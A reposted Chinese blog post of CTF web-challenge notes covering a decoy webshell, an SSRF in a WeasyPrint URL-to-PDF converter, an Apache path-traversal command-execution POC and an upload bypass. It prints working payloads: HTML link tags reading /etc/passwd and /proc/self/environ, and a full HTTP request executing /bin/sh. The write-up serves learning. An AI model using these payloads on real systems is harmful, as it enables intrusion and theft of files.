首页 > 其他分享 >ctf web赛道基础 万字笔记

ctf web赛道基础 万字笔记

时间:2024-11-01 22:16:09浏览次数:3  
标签:赛道 web 文件 32% flag ctf PDF com 2e%

《Java代码审计》icon-default.png?t=O83Ahttp://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247484219&idx=1&sn=73564e316a4c9794019f15dd6b3ba9f6&chksm=c0e47a67f793f371e9f6a4fbc06e7929cb1480b7320fae34c32563307df3a28aca49d1a4addd&scene=21#wechat_redirect

《Web安全》icon-default.png?t=O83Ahttp://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247484238&idx=1&sn=ca66551c31e37b8d726f151265fc9211&chksm=c0e47a12f793f3049fefde6e9ebe9ec4e2c7626b8594511bd314783719c216bd9929962a71e6&scene=21#wechat_redirect

《网安面试指南》icon-default.png?t=O83Ahttp://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247484339&idx=1&sn=356300f169de74e7a778b04bfbbbd0ab&chksm=c0e47aeff793f3f9a5f7abcfa57695e8944e52bca2de2c7a3eb1aecb3c1e6b9cb6abe509d51f&scene=21#wechat_redirect

1.真亦假,假亦真:

图片

六秒之后跳转到如下页面:

图片

果真是标准一句话木马,尝试传参,但却无法正常执行。

图片

扫目录,发现/flag,访问之即可获取到flag

图片

2.CSDN_TO_PDFV1.2

图片

网站功能大概就是将目标网页转换为PDF文件,但URL中必须包含blog.csdn.net,错一丁点都不行

包含指定字符串时,页面正常回显。

图片

不包含指定字符串时,会提示:“invalid URL”'

图片

参考:https://blog.csdn.net/RABCDXB/article/details/122659054,目标网站可能存在SSRF漏洞,可将blog.csdn.net作为GET传参,成功绕过。

图片

没有VPS,可以尝试使用花生壳做内网穿透。先尝试做一个指纹识别,使用nc监听相应端口,让目标网站发起网络请求

图片

可以看到UA头是:WeasyPrint 61.2,WeasyPrint是一个用于HTML和CSS的可视化渲染引擎,可以将HTML文档导出为打印标准的PDF文件。而WeasyPrint 重新定义了一组 html 标签,包括 img、embed、object 等,当使用link标签时,WeasyPrint会尝试引用(读取)目标链接所指向的内容并附加在PDF文档内。

可参考:

https://nahamsec.com/posts/my-expense-report-resulted-in-a-server-side-request-forgery-ssrf-on-lyft

图片

在VPS新建一个index.html,可以绕过对于html字符串的过滤,内容为:

<!DOCTYPE html><html><head><title>cai</title></head><body>
<link rel = "attachment" href = "file:///etc/passwd"></body></html>

再次让目标服务器访问我们的VPS,读取网页内容并转换为PDF

图片

使用binwalk分离该PDF文件,同时查看文件内容

图片

可以看到成功读取了/etc/passwd文件内容,下一步就是读取flag文件,flag在/proc/self/environ文件中,修改html文件内容如下:

<!DOCTYPE html><html><head><title>cai</title></head><body>
<link rel = "attachment" href = "file:///proc/self/environ"></body></html>

以同样的方式处理PDF文件,成功读取flag

图片

3.MYAPACHE

某杯的某个题目

图片

apache2.4.5 存在命令执行漏洞。

参考:https://www.cnblogs.com/1zzZ/p/17637671.html

POC:

POST /cgi-bin/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/bin/sh HTTP/1.1Host: 192.168.19.107:8002Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 8
echo; ls /

图片

查看flag文件内容

图片

base64解码,保存文件内容。

图片

图片

压缩包文件,需要密码。密码在/cgi-bin/test-cgi,密码是20240202ctf

图片

图片

4.ls就可以了

图片

文件上传绕过,文件类型检测可用Gif绕过。

图片

图片

标签:赛道,web,文件,32%,flag,ctf,PDF,com,2e%
From: https://blog.csdn.net/jxiang213/article/details/143441874

相关文章

  • [ACTF2020 新生赛]Include
    链接:https://buuoj.cn/challenges#[ACTF2020新生赛]Include。打开环境后如下,只有一个"tips"的超链接。访问tips,留意传入了"file"参数。接下来,可以尝试下路径穿越:?file=flag.php../../../../../etc/passwd。可以看到,存在路径穿越漏洞,但是通过路径穿越漏洞并没有读取到......
  • [ACTF2020 新生赛]Exec
    题目链接:https://buuoj.cn/challenges#[ACTF2020新生赛]Exec。打开后,环境如下。尝试输入"127.0.0.1",抓取请求包。POST/HTTP/1.1Host:038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81Content-Length:16Cache-Control:max-age=0Upgrade-Insecure-Requests:......
  • [GXYCTF2019]Ping Ping Ping
    题目链接:https://buuoj.cn/challenges#[GXYCTF2019]PingPingPing打开环境后如下所示。题目直接提示了有一个GET参数,参数名是"ip",尝试输入:?ip=127.0.0.1后,结果如下所示。可以看到,网站后端进行了一个ping操作,猜测参数:ip可能存在命令注入漏洞。尝试输入:ip=;id,发现可以......
  • CTF学习(15)MISC(FLAG)
    1.图片(?)--->查看详细信息(无果)--->010editor查看是否修改宽高或内藏编码(无果)---使用stegsolve逐层查看(无果)--->选中RGB三个通道的0层使用preview按钮发现存在PK文件(知识点:PK是一种压缩文件)选择SAVEBin保存为.zip格式的文件(目前遇到的这种LSB隐写题目都是将数据放在0......
  • 2024御网杯web
    Webinput_data就是一个简单是svn泄露直接在pristine/57/中即可找到Admin通过爆错和提示可以确定是Thymeleaf模板注入命令执行参考资料:https://zhuanlan.zhihu.com/p/248416919https://xz.aliyun.com/t/9826?u_atoken=b9d5b4c8f462ecf95b3441b560c7c2f1&u_asig=0a47......
  • 黑马JavaWeb-day04
    @目录mavenmaven简介maven安装IDEA集成maven创建maven项目Maven坐标依赖管理单元测试Web入门Springboot入门HTTP协议三层架构分层解耦\(IOC\&DI\)入门\(IOC\)和\(DI\)详解mavenmaven简介maven:\(Maven\)是\(apache\)旗下的一个开源项目,是一款用于管理和构建\(java\)项目的......
  • 【Java Web】使用JDBC操作数据库(含代码示例)
    文章目录JDBC主要组成部分访问数据库步骤数据库交互StatementPreparedStatementSQL注入攻击演示示例单查询多查询返回记录数JDBC(JavaDatabaseConnectivity)是Java中用于执行SQL语句的标准API,它提供了一种统一的方式来访问各种关系型数据库。JDBC使得开发者能够以......
  • [NPUCTF2020]Anti-IDA
    [NPUCTF2020]Anti-IDAbuuctf刷题碰到的。没见到网上有wp就写一份吧很多无关的操作,只要不对输入数据影响就不需要管,最后exp如下enc=b"\x33\x44\x33\x39\x33\x41\x33\x37\x33\x34\x33\x43\x33\x39\x33\x37\x33\x41\x33\x34\x33\x41\x33\x37\x33\x44\x33\x36\x33\x36\x33\x41\......
  • ctfshow web入门 文件上传
    CtfshowWeb入门151 查看源代码,发现只能上传.png的文件用bp抓包.png的图片格式添加一句话木马,文件格式修改成.php   对于上传成功的后门代码,直接通过hackbar发送post包利用php内置system()函数执行  查看flag.php文件   152和上一题做题步骤一样......
  • webpack5配置传统jQuery多页面应用
    简介大家好,我是chenms,最近我们公司有要求需要开发几个以前传统的前后端不分离的jQuery老项目,现在大部分都是用vue或者react开发习惯了组件化的方式,所以我这边打算用webpack5配置一个可以打包传统jQuery多页面应用想法通过配置postcss给css自动加上前缀通过配置babel把e......